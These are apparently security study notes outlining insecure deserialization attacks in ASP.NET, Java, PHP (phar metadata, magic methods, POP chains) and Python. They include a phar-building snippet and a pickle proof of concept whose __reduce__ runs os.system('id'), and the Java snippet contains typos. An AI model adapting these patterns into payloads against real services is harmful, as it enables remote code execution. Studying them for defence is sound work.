Deserialization

• ASP.NET Deserialization

  ViewState, Session, ... are highly possible to have serialize data encrypted by machine key stored in web.config.

  • ysoserial.net
  • Java

  • Gadgets

    • CommonsCollections

  • Magic Method

    • toString

    • readObject

      public class Cat implements Serializable {
          ...
          private vlid readObject(ObjectInputStream in) {
              throws IOException, ClassNotFoundException {
                  ...
              }
          }
      }
      

    • finalize

    • ...

  • ysoserial

• PHP

  Feature removed since PHP 8.0

  • Phar Format
    • stub
    • manifest (... serialized file meta-data, stored in serialize() format ...)
    • contents
    • signature (optional)
  • Magic Method
    • __destruct()
    • __wakeup()
    • __call()
    • __toString()

  • Phar Deserializationphar://

    Trigger
    file_get_contents()	include()	file_exists()
    getimagesize()	unlink()	file()
    fopen()	is_dir()	...

    • Create phar file by php --define phar.readonly=0 ${file}

      <?php
          class Cat {}
          $phar = new Phar("pharfile.phar");
          $phar->startBuffering();
          $phar->setStub("<?php __HALT_COMPILER(); ?>");
          $c = new Cat();
          $phar->setMetadata($c);
          $phar->addFromString("meow.txt", "owo");
          $phar->stopBuffering();
      ?>
      

  • POP Chain

• Python

  • Magic Method
    • __reduce__()

  • pickle

    Stack-based virtual pickle machine

    class Exploit(object):
        def __reduce__(self):
            return (os.system, ('id', ))
    
    serialized = pickle.dumps(Exploit())
    pickle.loads(serialized)
    #pickletools.dis(serialized)